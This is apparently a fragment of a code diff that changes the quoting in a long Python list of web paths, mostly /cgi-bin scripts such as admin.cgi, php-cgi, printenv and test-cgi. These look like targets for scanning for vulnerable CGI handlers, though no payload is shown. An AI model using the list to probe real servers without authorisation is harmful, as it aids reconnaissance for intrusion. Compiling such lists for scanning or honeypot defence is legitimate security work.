r'/b2-include/b2edit.showposts.php',
|
r"/b2-include/b2edit.showposts.php",
|
||||||
r'/bandwidth/index.cgi',
|
r"/bandwidth/index.cgi",
|
||||||
r'/bigconf.cgi',
|
r"/bigconf.cgi",
|
||||||
r'/cartcart.cgi',
|
r"/cartcart.cgi",
|
||||||
r'/cart.cgi',
|
r"/cart.cgi",
|
||||||
r'/ccbill/whereami.cgi',
|
r"/ccbill/whereami.cgi",
|
||||||
r'/cgi-bin/14all-1.1.cgi',
|
r"/cgi-bin/14all-1.1.cgi",
|
||||||
r'/cgi-bin/14all.cgi',
|
r"/cgi-bin/14all.cgi",
|
||||||
r'/cgi-bin/a1disp3.cgi',
|
r"/cgi-bin/a1disp3.cgi",
|
||||||
r'/cgi-bin/a1stats/a1disp3.cgi',
|
r"/cgi-bin/a1stats/a1disp3.cgi",
|
||||||
r'/cgi-bin/a1stats/a1disp4.cgi',
|
r"/cgi-bin/a1stats/a1disp4.cgi",
|
||||||
r'/cgi-bin/addbanner.cgi',
|
r"/cgi-bin/addbanner.cgi",
|
||||||
r'/cgi-bin/add_ftp.cgi',
|
r"/cgi-bin/add_ftp.cgi",
|
||||||
r'/cgi-bin/adduser.cgi',
|
r"/cgi-bin/adduser.cgi",
|
||||||
r'/cgi-bin/admin/admin.cgi',
|
r"/cgi-bin/admin/admin.cgi",
|
||||||
r'/cgi-bin/admin.cgi',
|
r"/cgi-bin/admin.cgi",
|
||||||
r'/cgi-bin/admin/getparam.cgi',
|
r"/cgi-bin/admin/getparam.cgi",
|
||||||
r'/cgi-bin/adminhot.cgi',
|
r"/cgi-bin/adminhot.cgi",
|
||||||
r'/cgi-bin/admin.pl',
|
r"/cgi-bin/admin.pl",
|
||||||
r'/cgi-bin/admin/setup.cgi',
|
r"/cgi-bin/admin/setup.cgi",
|
||||||
r'/cgi-bin/adminwww.cgi',
|
r"/cgi-bin/adminwww.cgi",
|
||||||
r'/cgi-bin/af.cgi',
|
r"/cgi-bin/af.cgi",
|
||||||
r'/cgi-bin/aglimpse.cgi',
|
r"/cgi-bin/aglimpse.cgi",
|
||||||
r'/cgi-bin/alienform.cgi',
|
r"/cgi-bin/alienform.cgi",
|
||||||
r'/cgi-bin/AnyBoard.cgi',
|
r"/cgi-bin/AnyBoard.cgi",
|
||||||
r'/cgi-bin/architext_query.cgi',
|
r"/cgi-bin/architext_query.cgi",
|
||||||
r'/cgi-bin/astrocam.cgi',
|
r"/cgi-bin/astrocam.cgi",
|
||||||
r'/cgi-bin/AT-admin.cgi',
|
r"/cgi-bin/AT-admin.cgi",
|
||||||
r'/cgi-bin/AT-generate.cgi',
|
r"/cgi-bin/AT-generate.cgi",
|
||||||
r'/cgi-bin/auction/auction.cgi',
|
r"/cgi-bin/auction/auction.cgi",
|
||||||
r'/cgi-bin/auktion.cgi',
|
r"/cgi-bin/auktion.cgi",
|
||||||
r'/cgi-bin/ax-admin.cgi',
|
r"/cgi-bin/ax-admin.cgi",
|
||||||
r'/cgi-bin/ax.cgi',
|
r"/cgi-bin/ax.cgi",
|
||||||
r'/cgi-bin/axs.cgi',
|
r"/cgi-bin/axs.cgi",
|
||||||
r'/cgi-bin/badmin.cgi',
|
r"/cgi-bin/badmin.cgi",
|
||||||
r'/cgi-bin/banner.cgi',
|
r"/cgi-bin/banner.cgi",
|
||||||
r'/cgi-bin/bannereditor.cgi',
|
r"/cgi-bin/bannereditor.cgi",
|
||||||
r'/cgi-bin/bb-ack.sh',
|
r"/cgi-bin/bb-ack.sh",
|
||||||
r'/cgi-bin/bb-histlog.sh',
|
r"/cgi-bin/bb-histlog.sh",
|
||||||
r'/cgi-bin/bb-hist.sh',
|
r"/cgi-bin/bb-hist.sh",
|
||||||
r'/cgi-bin/bb-hostsvc.sh',
|
r"/cgi-bin/bb-hostsvc.sh",
|
||||||
r'/cgi-bin/bb-replog.sh',
|
r"/cgi-bin/bb-replog.sh",
|
||||||
r'/cgi-bin/bb-rep.sh',
|
r"/cgi-bin/bb-rep.sh",
|
||||||
r'/cgi-bin/bbs_forum.cgi',
|
r"/cgi-bin/bbs_forum.cgi",
|
||||||
r'/cgi-bin/bigconf.cgi',
|
r"/cgi-bin/bigconf.cgi",
|
||||||
r'/cgi-bin/bizdb1-search.cgi',
|
r"/cgi-bin/bizdb1-search.cgi",
|
||||||
r'/cgi-bin/blog/mt-check.cgi',
|
r"/cgi-bin/blog/mt-check.cgi",
|
||||||
r'/cgi-bin/blog/mt-load.cgi',
|
r"/cgi-bin/blog/mt-load.cgi",
|
||||||
r'/cgi-bin/bnbform.cgi',
|
r"/cgi-bin/bnbform.cgi",
|
||||||
r'/cgi-bin/book.cgi',
|
r"/cgi-bin/book.cgi",
|
||||||
r'/cgi-bin/boozt/admin/index.cgi',
|
r"/cgi-bin/boozt/admin/index.cgi",
|
||||||
r'/cgi-bin/bsguest.cgi',
|
r"/cgi-bin/bsguest.cgi",
|
||||||
r'/cgi-bin/bslist.cgi',
|
r"/cgi-bin/bslist.cgi",
|
||||||
r'/cgi-bin/build.cgi',
|
r"/cgi-bin/build.cgi",
|
||||||
r'/cgi-bin/bulk/bulk.cgi',
|
r"/cgi-bin/bulk/bulk.cgi",
|
||||||
r'/cgi-bin/cached_feed.cgi',
|
r"/cgi-bin/cached_feed.cgi",
|
||||||
r'/cgi-bin/cachemgr.cgi',
|
r"/cgi-bin/cachemgr.cgi",
|
||||||
r'/cgi-bin/calendar/index.cgi',
|
r"/cgi-bin/calendar/index.cgi",
|
||||||
r'/cgi-bin/cartmanager.cgi',
|
r"/cgi-bin/cartmanager.cgi",
|
||||||
r'/cgi-bin/cbmc/forums.cgi',
|
r"/cgi-bin/cbmc/forums.cgi",
|
||||||
r'/cgi-bin/ccvsblame.cgi',
|
r"/cgi-bin/ccvsblame.cgi",
|
||||||
r'/cgi-bin/c_download.cgi',
|
r"/cgi-bin/c_download.cgi",
|
||||||
r'/cgi-bin/cgforum.cgi',
|
r"/cgi-bin/cgforum.cgi",
|
||||||
r'/cgi-bin/.cgi',
|
r"/cgi-bin/.cgi",
|
||||||
r'/cgi-bin/cgi_process',
|
r"/cgi-bin/cgi_process",
|
||||||
r'/cgi-bin/classified.cgi',
|
r"/cgi-bin/classified.cgi",
|
||||||
r'/cgi-bin/classifieds.cgi',
|
r"/cgi-bin/classifieds.cgi",
|
||||||
r'/cgi-bin/classifieds/classifieds.cgi',
|
r"/cgi-bin/classifieds/classifieds.cgi",
|
||||||
r'/cgi-bin/classifieds/index.cgi',
|
r"/cgi-bin/classifieds/index.cgi",
|
||||||
r'/cgi-bin/.cobalt/alert/service.cgi',
|
r"/cgi-bin/.cobalt/alert/service.cgi",
|
||||||
r'/cgi-bin/.cobalt/message/message.cgi',
|
r"/cgi-bin/.cobalt/message/message.cgi",
|
||||||
r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi',
|
r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi",
|
||||||
r'/cgi-bin/commandit.cgi',
|
r"/cgi-bin/commandit.cgi",
|
||||||
r'/cgi-bin/commerce.cgi',
|
r"/cgi-bin/commerce.cgi",
|
||||||
r'/cgi-bin/common/listrec.pl',
|
r"/cgi-bin/common/listrec.pl",
|
||||||
r'/cgi-bin/compatible.cgi',
|
r"/cgi-bin/compatible.cgi",
|
||||||
r'/cgi-bin/Count.cgi',
|
r"/cgi-bin/Count.cgi",
|
||||||
r'/cgi-bin/csChatRBox.cgi',
|
r"/cgi-bin/csChatRBox.cgi",
|
||||||
r'/cgi-bin/csGuestBook.cgi',
|
r"/cgi-bin/csGuestBook.cgi",
|
||||||
r'/cgi-bin/csLiveSupport.cgi',
|
r"/cgi-bin/csLiveSupport.cgi",
|
||||||
r'/cgi-bin/CSMailto.cgi',
|
r"/cgi-bin/CSMailto.cgi",
|
||||||
r'/cgi-bin/CSMailto/CSMailto.cgi',
|
r"/cgi-bin/CSMailto/CSMailto.cgi",
|
||||||
r'/cgi-bin/csNews.cgi',
|
r"/cgi-bin/csNews.cgi",
|
||||||
r'/cgi-bin/csNewsPro.cgi',
|
r"/cgi-bin/csNewsPro.cgi",
|
||||||
r'/cgi-bin/csPassword.cgi',
|
r"/cgi-bin/csPassword.cgi",
|
||||||
r'/cgi-bin/csPassword/csPassword.cgi',
|
r"/cgi-bin/csPassword/csPassword.cgi",
|
||||||
r'/cgi-bin/csSearch.cgi',
|
r"/cgi-bin/csSearch.cgi",
|
||||||
r'/cgi-bin/csv_db.cgi',
|
r"/cgi-bin/csv_db.cgi",
|
||||||
r'/cgi-bin/cvsblame.cgi',
|
r"/cgi-bin/cvsblame.cgi",
|
||||||
r'/cgi-bin/cvslog.cgi',
|
r"/cgi-bin/cvslog.cgi",
|
||||||
r'/cgi-bin/cvsquery.cgi',
|
r"/cgi-bin/cvsquery.cgi",
|
||||||
r'/cgi-bin/cvsqueryform.cgi',
|
r"/cgi-bin/cvsqueryform.cgi",
|
||||||
r'/cgi-bin/day5datacopier.cgi',
|
r"/cgi-bin/day5datacopier.cgi",
|
||||||
r'/cgi-bin/day5datanotifier.cgi',
|
r"/cgi-bin/day5datanotifier.cgi",
|
||||||
r'/cgi-bin/db_manager.cgi',
|
r"/cgi-bin/db_manager.cgi",
|
||||||
r'/cgi-bin/dbman/db.cgi',
|
r"/cgi-bin/dbman/db.cgi",
|
||||||
r'/cgi-bin/dcforum.cgi',
|
r"/cgi-bin/dcforum.cgi",
|
||||||
r'/cgi-bin/dcshop.cgi',
|
r"/cgi-bin/dcshop.cgi",
|
||||||
r'/cgi-bin/dfire.cgi',
|
r"/cgi-bin/dfire.cgi",
|
||||||
r'/cgi-bin/diagnose.cgi',
|
r"/cgi-bin/diagnose.cgi",
|
||||||
r'/cgi-bin/dig.cgi',
|
r"/cgi-bin/dig.cgi",
|
||||||
r'/cgi-bin/directorypro.cgi',
|
r"/cgi-bin/directorypro.cgi",
|
||||||
r'/cgi-bin/download.cgi',
|
r"/cgi-bin/download.cgi",
|
||||||
r'/cgi-bin/e87_Ba79yo87.cgi',
|
r"/cgi-bin/e87_Ba79yo87.cgi",
|
||||||
r'/cgi-bin/emu/html/emumail.cgi',
|
r"/cgi-bin/emu/html/emumail.cgi",
|
||||||
r'/cgi-bin/emumail.cgi',
|
r"/cgi-bin/emumail.cgi",
|
||||||
r'/cgi-bin/emumail/emumail.cgi',
|
r"/cgi-bin/emumail/emumail.cgi",
|
||||||
r'/cgi-bin/enter.cgi',
|
r"/cgi-bin/enter.cgi",
|
||||||
r'/cgi-bin/environ.cgi',
|
r"/cgi-bin/environ.cgi",
|
||||||
r'/cgi-bin/ezadmin.cgi',
|
r"/cgi-bin/ezadmin.cgi",
|
||||||
r'/cgi-bin/ezboard.cgi',
|
r"/cgi-bin/ezboard.cgi",
|
||||||
r'/cgi-bin/ezman.cgi',
|
r"/cgi-bin/ezman.cgi",
|
||||||
r'/cgi-bin/ezshopper2/loadpage.cgi',
|
r"/cgi-bin/ezshopper2/loadpage.cgi",
|
||||||
r'/cgi-bin/ezshopper3/loadpage.cgi',
|
r"/cgi-bin/ezshopper3/loadpage.cgi",
|
||||||
r'/cgi-bin/ezshopper/loadpage.cgi',
|
r"/cgi-bin/ezshopper/loadpage.cgi",
|
||||||
r'/cgi-bin/ezshopper/search.cgi',
|
r"/cgi-bin/ezshopper/search.cgi",
|
||||||
r'/cgi-bin/faqmanager.cgi',
|
r"/cgi-bin/faqmanager.cgi",
|
||||||
r'/cgi-bin/FileSeek2.cgi',
|
r"/cgi-bin/FileSeek2.cgi",
|
||||||
r'/cgi-bin/FileSeek.cgi',
|
r"/cgi-bin/FileSeek.cgi",
|
||||||
r'/cgi-bin/finger.cgi',
|
r"/cgi-bin/finger.cgi",
|
||||||
r'/cgi-bin/flexform.cgi',
|
r"/cgi-bin/flexform.cgi",
|
||||||
r'/cgi-bin/fom.cgi',
|
r"/cgi-bin/fom.cgi",
|
||||||
r'/cgi-bin/fom/fom.cgi',
|
r"/cgi-bin/fom/fom.cgi",
|
||||||
r'/cgi-bin/FormHandler.cgi',
|
r"/cgi-bin/FormHandler.cgi",
|
||||||
r'/cgi-bin/FormMail.cgi',
|
r"/cgi-bin/FormMail.cgi",
|
||||||
r'/cgi-bin/gbadmin.cgi',
|
r"/cgi-bin/gbadmin.cgi",
|
||||||
r'/cgi-bin/gbook/gbook.cgi',
|
r"/cgi-bin/gbook/gbook.cgi",
|
||||||
r'/cgi-bin/generate.cgi',
|
r"/cgi-bin/generate.cgi",
|
||||||
r'/cgi-bin/getdoc.cgi',
|
r"/cgi-bin/getdoc.cgi",
|
||||||
r'/cgi-bin/gH.cgi',
|
r"/cgi-bin/gH.cgi",
|
||||||
r'/cgi-bin/gm-authors.cgi',
|
r"/cgi-bin/gm-authors.cgi",
|
||||||
r'/cgi-bin/gm.cgi',
|
r"/cgi-bin/gm.cgi",
|
||||||
r'/cgi-bin/gm-cplog.cgi',
|
r"/cgi-bin/gm-cplog.cgi",
|
||||||
r'/cgi-bin/guestbook.cgi',
|
r"/cgi-bin/guestbook.cgi",
|
||||||
r'/cgi-bin/handler',
|
r"/cgi-bin/handler",
|
||||||
r'/cgi-bin/handler.cgi',
|
r"/cgi-bin/handler.cgi",
|
||||||
r'/cgi-bin/handler/netsonar',
|
r"/cgi-bin/handler/netsonar",
|
||||||
r'/cgi-bin/hitview.cgi',
|
r"/cgi-bin/hitview.cgi",
|
||||||
r'/cgi-bin/hsx.cgi',
|
r"/cgi-bin/hsx.cgi",
|
||||||
r'/cgi-bin/html2chtml.cgi',
|
r"/cgi-bin/html2chtml.cgi",
|
||||||
r'/cgi-bin/html2wml.cgi',
|
r"/cgi-bin/html2wml.cgi",
|
||||||
r'/cgi-bin/htsearch.cgi',
|
r"/cgi-bin/htsearch.cgi",
|
||||||
r'/cgi-bin/hw.sh', # testing
|
r"/cgi-bin/hw.sh", # testing
|
||||||
r'/cgi-bin/icat',
|
r"/cgi-bin/icat",
|
||||||
r'/cgi-bin/if/admin/nph-build.cgi',
|
r"/cgi-bin/if/admin/nph-build.cgi",
|
||||||
r'/cgi-bin/ikonboard/help.cgi',
|
r"/cgi-bin/ikonboard/help.cgi",
|
||||||
r'/cgi-bin/ImageFolio/admin/admin.cgi',
|
r"/cgi-bin/ImageFolio/admin/admin.cgi",
|
||||||
r'/cgi-bin/imageFolio.cgi',
|
r"/cgi-bin/imageFolio.cgi",
|
||||||
r'/cgi-bin/index.cgi',
|
r"/cgi-bin/index.cgi",
|
||||||
r'/cgi-bin/infosrch.cgi',
|
r"/cgi-bin/infosrch.cgi",
|
||||||
r'/cgi-bin/jammail.pl',
|
r"/cgi-bin/jammail.pl",
|
||||||
r'/cgi-bin/journal.cgi',
|
r"/cgi-bin/journal.cgi",
|
||||||
r'/cgi-bin/lastlines.cgi',
|
r"/cgi-bin/lastlines.cgi",
|
||||||
r'/cgi-bin/loadpage.cgi',
|
r"/cgi-bin/loadpage.cgi",
|
||||||
r'/cgi-bin/login.cgi',
|
r"/cgi-bin/login.cgi",
|
||||||
r'/cgi-bin/logit.cgi',
|
r"/cgi-bin/logit.cgi",
|
||||||
r'/cgi-bin/log-reader.cgi',
|
r"/cgi-bin/log-reader.cgi",
|
||||||
r'/cgi-bin/lookwho.cgi',
|
r"/cgi-bin/lookwho.cgi",
|
||||||
r'/cgi-bin/lwgate.cgi',
|
r"/cgi-bin/lwgate.cgi",
|
||||||
r'/cgi-bin/MachineInfo',
|
r"/cgi-bin/MachineInfo",
|
||||||
r'/cgi-bin/MachineInfo',
|
r"/cgi-bin/MachineInfo",
|
||||||
r'/cgi-bin/magiccard.cgi',
|
r"/cgi-bin/magiccard.cgi",
|
||||||
r'/cgi-bin/mail/emumail.cgi',
|
r"/cgi-bin/mail/emumail.cgi",
|
||||||
r'/cgi-bin/maillist.cgi',
|
r"/cgi-bin/maillist.cgi",
|
||||||
r'/cgi-bin/mailnews.cgi',
|
r"/cgi-bin/mailnews.cgi",
|
||||||
r'/cgi-bin/mail/nph-mr.cgi',
|
r"/cgi-bin/mail/nph-mr.cgi",
|
||||||
r'/cgi-bin/main.cgi',
|
r"/cgi-bin/main.cgi",
|
||||||
r'/cgi-bin/main_menu.pl',
|
r"/cgi-bin/main_menu.pl",
|
||||||
r'/cgi-bin/man.sh',
|
r"/cgi-bin/man.sh",
|
||||||
r'/cgi-bin/mini_logger.cgi',
|
r"/cgi-bin/mini_logger.cgi",
|
||||||
r'/cgi-bin/mmstdod.cgi',
|
r"/cgi-bin/mmstdod.cgi",
|
||||||
r'/cgi-bin/moin.cgi',
|
r"/cgi-bin/moin.cgi",
|
||||||
r'/cgi-bin/mojo/mojo.cgi',
|
r"/cgi-bin/mojo/mojo.cgi",
|
||||||
r'/cgi-bin/mrtg.cgi',
|
r"/cgi-bin/mrtg.cgi",
|
||||||
r'/cgi-bin/mt.cgi',
|
r"/cgi-bin/mt.cgi",
|
||||||
r'/cgi-bin/mt/mt.cgi',
|
r"/cgi-bin/mt/mt.cgi",
|
||||||
r'/cgi-bin/mt/mt-check.cgi',
|
r"/cgi-bin/mt/mt-check.cgi",
|
||||||
r'/cgi-bin/mt/mt-load.cgi',
|
r"/cgi-bin/mt/mt-load.cgi",
|
||||||
r'/cgi-bin/mt-static/mt-check.cgi',
|
r"/cgi-bin/mt-static/mt-check.cgi",
|
||||||
r'/cgi-bin/mt-static/mt-load.cgi',
|
r"/cgi-bin/mt-static/mt-load.cgi",
|
||||||
r'/cgi-bin/musicqueue.cgi',
|
r"/cgi-bin/musicqueue.cgi",
|
||||||
r'/cgi-bin/myguestbook.cgi',
|
r"/cgi-bin/myguestbook.cgi",
|
||||||
r'/cgi-bin/.namazu.cgi',
|
r"/cgi-bin/.namazu.cgi",
|
||||||
r'/cgi-bin/nbmember.cgi',
|
r"/cgi-bin/nbmember.cgi",
|
||||||
r'/cgi-bin/netauth.cgi',
|
r"/cgi-bin/netauth.cgi",
|
||||||
r'/cgi-bin/netpad.cgi',
|
r"/cgi-bin/netpad.cgi",
|
||||||
r'/cgi-bin/newsdesk.cgi',
|
r"/cgi-bin/newsdesk.cgi",
|
||||||
r'/cgi-bin/nlog-smb.cgi',
|
r"/cgi-bin/nlog-smb.cgi",
|
||||||
r'/cgi-bin/nph-emumail.cgi',
|
r"/cgi-bin/nph-emumail.cgi",
|
||||||
r'/cgi-bin/nph-exploitscanget.cgi',
|
r"/cgi-bin/nph-exploitscanget.cgi",
|
||||||
r'/cgi-bin/nph-publish.cgi',
|
r"/cgi-bin/nph-publish.cgi",
|
||||||
r'/cgi-bin/nph-test.cgi',
|
r"/cgi-bin/nph-test.cgi",
|
||||||
r'/cgi-bin/pagelog.cgi',
|
r"/cgi-bin/pagelog.cgi",
|
||||||
r'/cgi-bin/pbcgi.cgi',
|
r"/cgi-bin/pbcgi.cgi",
|
||||||
r'/cgi-bin/perlshop.cgi',
|
r"/cgi-bin/perlshop.cgi",
|
||||||
r'/cgi-bin/pfdispaly.cgi',
|
r"/cgi-bin/pfdispaly.cgi",
|
||||||
r'/cgi-bin/pfdisplay.cgi',
|
r"/cgi-bin/pfdisplay.cgi",
|
||||||
r'/cgi-bin/phf.cgi',
|
r"/cgi-bin/phf.cgi",
|
||||||
r'/cgi-bin/photo/manage.cgi',
|
r"/cgi-bin/photo/manage.cgi",
|
||||||
r'/cgi-bin/photo/protected/manage.cgi',
|
r"/cgi-bin/photo/protected/manage.cgi",
|
||||||
r'/cgi-bin/php-cgi',
|
r"/cgi-bin/php-cgi",
|
||||||
r'/cgi-bin/php.cgi',
|
r"/cgi-bin/php.cgi",
|
||||||
r'/cgi-bin/php.fcgi',
|
r"/cgi-bin/php.fcgi",
|
||||||
r'/cgi-bin/ping.sh',
|
r"/cgi-bin/ping.sh",
|
||||||
r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
|
r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi",
|
||||||
r'/cgi-bin/pollssi.cgi',
|
r"/cgi-bin/pollssi.cgi",
|
||||||
r'/cgi-bin/postcards.cgi',
|
r"/cgi-bin/postcards.cgi",
|
||||||
r'/cgi-bin/powerup/r.cgi',
|
r"/cgi-bin/powerup/r.cgi",
|
||||||
r'/cgi-bin/printenv',
|
r"/cgi-bin/printenv",
|
||||||
r'/cgi-bin/probecontrol.cgi',
|
r"/cgi-bin/probecontrol.cgi",
|
||||||
r'/cgi-bin/profile.cgi',
|
r"/cgi-bin/profile.cgi",
|
||||||
r'/cgi-bin/publisher/search.cgi',
|
r"/cgi-bin/publisher/search.cgi",
|
||||||
r'/cgi-bin/quickstore.cgi',
|
r"/cgi-bin/quickstore.cgi",
|
||||||
r'/cgi-bin/quizme.cgi',
|
r"/cgi-bin/quizme.cgi",
|
||||||
r'/cgi-bin/ratlog.cgi',
|
r"/cgi-bin/ratlog.cgi",
|
||||||
r'/cgi-bin/r.cgi',
|
r"/cgi-bin/r.cgi",
|
||||||
r'/cgi-bin/register.cgi',
|
r"/cgi-bin/register.cgi",
|
||||||
r'/cgi-bin/replicator/webpage.cgi/',
|
r"/cgi-bin/replicator/webpage.cgi/",
|
||||||
r'/cgi-bin/responder.cgi',
|
r"/cgi-bin/responder.cgi",
|
||||||
r'/cgi-bin/robadmin.cgi',
|
r"/cgi-bin/robadmin.cgi",
|
||||||
r'/cgi-bin/robpoll.cgi',
|
r"/cgi-bin/robpoll.cgi",
|
||||||
r'/cgi-bin/rtpd.cgi',
|
r"/cgi-bin/rtpd.cgi",
|
||||||
r'/cgi-bin/sbcgi/sitebuilder.cgi',
|
r"/cgi-bin/sbcgi/sitebuilder.cgi",
|
||||||
r'/cgi-bin/scoadminreg.cgi',
|
r"/cgi-bin/scoadminreg.cgi",
|
||||||
r'/cgi-bin-sdb/printenv',
|
r"/cgi-bin-sdb/printenv",
|
||||||
r'/cgi-bin/sdbsearch.cgi',
|
r"/cgi-bin/sdbsearch.cgi",
|
||||||
r'/cgi-bin/search',
|
r"/cgi-bin/search",
|
||||||
r'/cgi-bin/search.cgi',
|
r"/cgi-bin/search.cgi",
|
||||||
r'/cgi-bin/search/search.cgi',
|
r"/cgi-bin/search/search.cgi",
|
||||||
r'/cgi-bin/sendform.cgi',
|
r"/cgi-bin/sendform.cgi",
|
||||||
r'/cgi-bin/shop.cgi',
|
r"/cgi-bin/shop.cgi",
|
||||||
r'/cgi-bin/shopper.cgi',
|
r"/cgi-bin/shopper.cgi",
|
||||||
r'/cgi-bin/shopplus.cgi',
|
r"/cgi-bin/shopplus.cgi",
|
||||||
r'/cgi-bin/showcheckins.cgi',
|
r"/cgi-bin/showcheckins.cgi",
|
||||||
r'/cgi-bin/simplestguest.cgi',
|
r"/cgi-bin/simplestguest.cgi",
|
||||||
r'/cgi-bin/simplestmail.cgi',
|
r"/cgi-bin/simplestmail.cgi",
|
||||||
r'/cgi-bin/smartsearch.cgi',
|
r"/cgi-bin/smartsearch.cgi",
|
||||||
r'/cgi-bin/smartsearch/smartsearch.cgi',
|
r"/cgi-bin/smartsearch/smartsearch.cgi",
|
||||||
r'/cgi-bin/snorkerz.bat',
|
r"/cgi-bin/snorkerz.bat",
|
||||||
r'/cgi-bin/snorkerz.bat',
|
r"/cgi-bin/snorkerz.bat",
|
||||||
r'/cgi-bin/snorkerz.cmd',
|
r"/cgi-bin/snorkerz.cmd",
|
||||||
r'/cgi-bin/snorkerz.cmd',
|
r"/cgi-bin/snorkerz.cmd",
|
||||||
r'/cgi-bin/sojourn.cgi',
|
r"/cgi-bin/sojourn.cgi",
|
||||||
r'/cgi-bin/spin_client.cgi',
|
r"/cgi-bin/spin_client.cgi",
|
||||||
r'/cgi-bin/start.cgi',
|
r"/cgi-bin/start.cgi",
|
||||||
r'/cgi-bin/status',
|
r"/cgi-bin/status",
|
||||||
r'/cgi-bin/status_cgi',
|
r"/cgi-bin/status_cgi",
|
||||||
r'/cgi-bin/store/agora.cgi',
|
r"/cgi-bin/store/agora.cgi",
|
||||||
r'/cgi-bin/store.cgi',
|
r"/cgi-bin/store.cgi",
|
||||||
r'/cgi-bin/store/index.cgi',
|
r"/cgi-bin/store/index.cgi",
|
||||||
r'/cgi-bin/survey.cgi',
|
r"/cgi-bin/survey.cgi",
|
||||||
r'/cgi-bin/sync.cgi',
|
r"/cgi-bin/sync.cgi",
|
||||||
r'/cgi-bin/talkback.cgi',
|
r"/cgi-bin/talkback.cgi",
|
||||||
r'/cgi-bin/technote/main.cgi',
|
r"/cgi-bin/technote/main.cgi",
|
||||||
r'/cgi-bin/test2.pl',
|
r"/cgi-bin/test2.pl",
|
||||||
r'/cgi-bin/test-cgi',
|
r"/cgi-bin/test-cgi",
|
||||||
r'/cgi-bin/test.cgi',
|
r"/cgi-bin/test.cgi",
|
||||||
r'/cgi-bin/testing_whatever',
|
r"/cgi-bin/testing_whatever",
|
||||||
r'/cgi-bin/test/test.cgi',
|
r"/cgi-bin/test/test.cgi",
|
||||||
r'/cgi-bin/tidfinder.cgi',
|
r"/cgi-bin/tidfinder.cgi",
|
||||||
r'/cgi-bin/tigvote.cgi',
|
r"/cgi-bin/tigvote.cgi",
|
||||||
r'/cgi-bin/title.cgi',
|
r"/cgi-bin/title.cgi",
|
||||||
r'/cgi-bin/top.cgi',
|
r"/cgi-bin/top.cgi",
|
||||||
r'/cgi-bin/traffic.cgi',
|
r"/cgi-bin/traffic.cgi",
|
||||||
r'/cgi-bin/troops.cgi',
|
r"/cgi-bin/troops.cgi",
|
||||||
r'/cgi-bin/ttawebtop.cgi/',
|
r"/cgi-bin/ttawebtop.cgi/",
|
||||||
r'/cgi-bin/ultraboard.cgi',
|
r"/cgi-bin/ultraboard.cgi",
|
||||||
r'/cgi-bin/upload.cgi',
|
r"/cgi-bin/upload.cgi",
|
||||||
r'/cgi-bin/urlcount.cgi',
|
r"/cgi-bin/urlcount.cgi",
|
||||||
r'/cgi-bin/viewcvs.cgi',
|
r"/cgi-bin/viewcvs.cgi",
|
||||||
r'/cgi-bin/view_help.cgi',
|
r"/cgi-bin/view_help.cgi",
|
||||||
r'/cgi-bin/viralator.cgi',
|
r"/cgi-bin/viralator.cgi",
|
||||||
r'/cgi-bin/virgil.cgi',
|
r"/cgi-bin/virgil.cgi",
|
||||||
r'/cgi-bin/vote.cgi',
|
r"/cgi-bin/vote.cgi",
|
||||||
r'/cgi-bin/vpasswd.cgi',
|
r"/cgi-bin/vpasswd.cgi",
|
||||||
r'/cgi-bin/way-board.cgi',
|
r"/cgi-bin/way-board.cgi",
|
||||||
r'/cgi-bin/way-board/way-board.cgi',
|
r"/cgi-bin/way-board/way-board.cgi",
|
||||||
r'/cgi-bin/webbbs.cgi',
|
r"/cgi-bin/webbbs.cgi",
|
||||||
r'/cgi-bin/webcart/webcart.cgi',
|
r"/cgi-bin/webcart/webcart.cgi",
|
||||||
r'/cgi-bin/webdist.cgi',
|
r"/cgi-bin/webdist.cgi",
|
||||||
r'/cgi-bin/webif.cgi',
|
r"/cgi-bin/webif.cgi",
|
||||||
r'/cgi-bin/webmail/html/emumail.cgi',
|
r"/cgi-bin/webmail/html/emumail.cgi",
|
||||||
r'/cgi-bin/webmap.cgi',
|
r"/cgi-bin/webmap.cgi",
|
||||||
r'/cgi-bin/webspirs.cgi',
|
r"/cgi-bin/webspirs.cgi",
|
||||||
r'/cgi-bin/Web_Store/web_store.cgi',
|
r"/cgi-bin/Web_Store/web_store.cgi",
|
||||||
r'/cgi-bin/whois.cgi',
|
r"/cgi-bin/whois.cgi",
|
||||||
r'/cgi-bin/whois_raw.cgi',
|
r"/cgi-bin/whois_raw.cgi",
|
||||||
r'/cgi-bin/whois/whois.cgi',
|
r"/cgi-bin/whois/whois.cgi",
|
||||||
r'/cgi-bin/wrap',
|
r"/cgi-bin/wrap",
|
||||||
r'/cgi-bin/wrap.cgi',
|
r"/cgi-bin/wrap.cgi",
|
||||||
r'/cgi-bin/wwwboard.cgi.cgi',
|
r"/cgi-bin/wwwboard.cgi.cgi",
|
||||||
r'/cgi-bin/YaBB/YaBB.cgi',
|
r"/cgi-bin/YaBB/YaBB.cgi",
|
||||||
r'/cgi-bin/zml.cgi',
|
r"/cgi-bin/zml.cgi",
|
||||||
r'/cgi-mod/index.cgi',
|
r"/cgi-mod/index.cgi",
|
||||||
r'/cgis/wwwboard/wwwboard.cgi',
|
r"/cgis/wwwboard/wwwboard.cgi",
|
||||||
r'/cgi-sys/addalink.cgi',
|
r"/cgi-sys/addalink.cgi",
|
||||||
r'/cgi-sys/defaultwebpage.cgi',
|
r"/cgi-sys/defaultwebpage.cgi",
|
||||||
r'/cgi-sys/domainredirect.cgi',
|
r"/cgi-sys/domainredirect.cgi",
|
||||||
r'/cgi-sys/entropybanner.cgi',
|
r"/cgi-sys/entropybanner.cgi",
|
||||||
r'/cgi-sys/entropysearch.cgi',
|
r"/cgi-sys/entropysearch.cgi",
|
||||||
r'/cgi-sys/FormMail-clone.cgi',
|
r"/cgi-sys/FormMail-clone.cgi",
|
||||||
r'/cgi-sys/helpdesk.cgi',
|
r"/cgi-sys/helpdesk.cgi",
|
||||||
r'/cgi-sys/mchat.cgi',
|
r"/cgi-sys/mchat.cgi",
|
||||||
r'/cgi-sys/randhtml.cgi',
|
r"/cgi-sys/randhtml.cgi",
|
||||||
r'/cgi-sys/realhelpdesk.cgi',
|
r"/cgi-sys/realhelpdesk.cgi",
|
||||||
r'/cgi-sys/realsignup.cgi',
|
r"/cgi-sys/realsignup.cgi",
|
||||||
r'/cgi-sys/signup.cgi',
|
r"/cgi-sys/signup.cgi",
|
||||||
r'/connector.cgi',
|
r"/connector.cgi",
|
||||||
r'/cp/rac/nsManager.cgi',
|
r"/cp/rac/nsManager.cgi",
|
||||||
r'/create_release.sh',
|
r"/create_release.sh",
|
